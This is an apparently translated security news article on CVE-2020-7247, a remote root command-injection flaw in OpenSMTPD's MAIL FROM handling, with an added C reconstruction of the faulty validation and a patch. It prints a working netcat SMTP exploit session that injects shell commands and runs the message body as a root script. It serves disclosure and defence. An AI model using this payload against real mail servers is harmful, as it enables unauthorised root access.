Vulnerability in OpenSMTPD allowing remote code execution with root privileges

A critical vulnerability (CVE-2020-7247) has been identified in OpenSMTPD, the mail server developed by the OpenBSD project. It allows shell commands to be executed on the server with root privileges. The issue was found during a re-audit by Qualys Security (the previous OpenSMTPD audit was carried out in 2015; the new vulnerability has been present since May 2018). The issue is fixed in the OpenSMTPD 6.6.2 release. All users are advised to install the update immediately (on OpenBSD the patch can be installed via syspatch).

There are two attack scenarios. The first works in the default OpenSMTPD configuration (accepting connections only from localhost) and allows the issue to be exploited locally, whenever the attacker can reach the server's loopback interface (for example, on shared hosting systems). The second applies when OpenSMTPD is configured to accept external connections (a mail server that accepts third-party mail). The researchers have prepared a prototype exploit that works against the OpenSMTPD version shipped with OpenBSD 6.6 and against the portable builds for other operating systems (tested on Debian Testing).

The problem is caused by an error in the smtp_mailaddr() function, which is called to validate the values of the "MAIL FROM" and "RCPT TO" fields that define the sender and recipient and are sent during the SMTP session with the mail server. To check the part of the email address before the "@" character, smtp_mailaddr() calls valid_localpart(), which treats the characters "!#$%&'*/?^`{|}~+-=_" as allowed (MAILADDR_ALLOWED), as required by RFC 5322.

The actual escaping of the string, however, is done in the mda_expand_token() function, which replaces only the characters "!#$%&'*?`{|}~" (MAILADDR_ESCAPE). The line prepared by mda_expand_token() is then used to invoke the delivery agent (MDA) via the call 'execle("/bin/sh", "/bin/sh", "-c", mda_command, ...'. For delivery to an mbox, /bin/sh is asked to run the line "/usr/libexec/mail.local -f %{mbox.from} %{user.username}", where the value of "%{mbox.from}" is the escaped data from the "MAIL FROM" parameter.

The essence of the vulnerability is a logic error in smtp_mailaddr(): if the email address carries an empty domain, the function returns a successful validation result even when the part of the address before "@" contains invalid characters. In addition, when preparing the string, mda_expand_token() does not escape all shell metacharacters, only the special characters that are permitted in email addresses. Thus, to run a command it is enough to use the ";" character and a space in the local part of the address; neither is in the MAILADDR_ESCAPE set, so neither is escaped. For example:

$ nc 127.0.0.1 25

HELO professor.falken
MAIL FROM:<;sleep 66;>
RCPT TO:<root>
DATA
.
QUIT

After this session, OpenSMTPD, when delivering to the mbox, will run the following command through the shell:

/usr/libexec/mail.local -f ;sleep 66; root
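To make the two defects concrete, here is an added C illustration written for this page; it is not OpenSMTPD's code. It reconstructs the control flow of smtp_mailaddr() as described above, a colon-substituting mda_expand_token()-style escape over MAILADDR_ESCAPE, and the mbox command template, and builds (but does not execute) the resulting command line. The valid_localpart()/valid_domainpart() bodies are simplified, the 64-character limit is taken from the text, and the "fixed" variant is an assumption about checking the local part before defaulting an empty domain, not the upstream 6.6.2 patch.

```c
/*
 * Added illustration of CVE-2020-7247 (not OpenSMTPD's own code).
 * Character sets match the text; function bodies are simplified.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAILADDR_ALLOWED "!#$%&'*/?^`{|}~+-=_"
#define MAILADDR_ESCAPE  "!#$%&'*?`{|}~"
#define MAXLOCALPART     64    /* local-part limit mentioned in the text */
#define MAXDOMAIN        255

/* Simplified RFC 5322 check: alphanumerics, MAILADDR_ALLOWED, inner dots. */
static int valid_localpart(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > MAXLOCALPART)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (isalnum(c) || strchr(MAILADDR_ALLOWED, c))
            continue;
        if (c == '.' && i > 0 && i + 1 < n && s[i + 1] != '.')
            continue;
        return 0;   /* ';', ' ' and other shell metacharacters land here */
    }
    return 1;
}

/* Simplified hostname check: letters, digits, '-' and '.'; non-empty. */
static int valid_domainpart(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > MAXDOMAIN)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '-' || c == '.'))
            return 0;
    }
    return 1;
}

/* Vulnerable shape: an empty domain is treated as "local user", the default
 * domain is filled in and the address is accepted without the local part
 * ever having been confirmed valid. Returns 1 = accept, 0 = reject. */
int smtp_mailaddr_vuln(const char *user, char *domain, size_t dlen,
                       int mailfrom, const char *default_domain)
{
    if (!valid_localpart(user) || !valid_domainpart(domain)) {
        if (mailfrom && user[0] == '\0' && domain[0] == '\0')
            return 1;                       /* empty return-path (bounces) */
        if (user[0] == '\0')
            return 0;                       /* no user part */
        if (domain[0] == '\0') {            /* BUG: user not re-checked */
            snprintf(domain, dlen, "%s", default_domain);
            return 1;
        }
        return 0;
    }
    return 1;
}

/* Fixed shape (assumed, not the upstream patch): the local part must pass
 * before an empty domain is defaulted. */
int smtp_mailaddr_fixed(const char *user, char *domain, size_t dlen,
                        int mailfrom, const char *default_domain)
{
    if (mailfrom && user[0] == '\0' && domain[0] == '\0')
        return 1;
    if (!valid_localpart(user))
        return 0;
    if (domain[0] == '\0') {
        snprintf(domain, dlen, "%s", default_domain);
        return 1;
    }
    return valid_domainpart(domain);
}

/* mda_expand_token()-style escaping: MAILADDR_ESCAPE characters become ':';
 * ';' and space are not in the set and pass through untouched. */
void mda_escape(const char *in, char *out, size_t outlen)
{
    size_t i;
    for (i = 0; in[i] != '\0' && i + 1 < outlen; i++)
        out[i] = strchr(MAILADDR_ESCAPE, in[i]) ? ':' : in[i];
    out[i] = '\0';
}

/* Builds the mbox delivery line that would be handed to /bin/sh -c. */
void build_mda_command(const char *from, const char *username,
                       char *cmd, size_t cmdlen)
{
    char esc[256];
    mda_escape(from, esc, sizeof esc);
    snprintf(cmd, cmdlen, "/usr/libexec/mail.local -f %s %s", esc, username);
}

int main(void)
{
    char domain[256] = "", cmd[512];
    const char *from = ";sleep 66;";          /* constructed MAIL FROM */
    int v = smtp_mailaddr_vuln(from, domain, sizeof domain, 1, "localhost");
    printf("vulnerable check: %s (domain now \"%s\")\n",
           v ? "accepted" : "rejected", domain);
    domain[0] = '\0';
    int f = smtp_mailaddr_fixed(from, domain, sizeof domain, 1, "localhost");
    printf("fixed check: %s\n", f ? "accepted" : "rejected");
    build_mda_command(from, "root", cmd, sizeof cmd);
    printf("would run: /bin/sh -c '%s'\n", cmd);
    return 0;
}
```

The interesting case is the combination: with a domain present the bad local part is rejected by both variants, and the escape routine does neutralise "$" and "|", but the empty-domain fallback accepts ";sleep 66;" unchanged, and ";" is exactly what the shell needs.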

The attack is limited, however, by the fact that the local part of the address cannot exceed 64 characters, and the special characters '$' and '|' are replaced with ":" during escaping. To get around this limitation, the researchers use the fact that after /usr/libexec/mail.local is launched, the body of the message is passed to it on standard input; that is, by controlling the address one need only start the sh interpreter and use the message body as its script. Since the SMTP service headers are placed at the beginning of the message, the read command is used in a loop to skip them. A working exploit looks like this:

$ nc 192.168.56.143 25

HELO professor.falken
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
RCPT TO:<root@localhost>
DATA
#0
#1
...
#d
for i in W O P R;do
echo -n "($i)" && id || break
done > /root/x."`id -u`.""$$"
.
QUIT

Source: opennet.ru
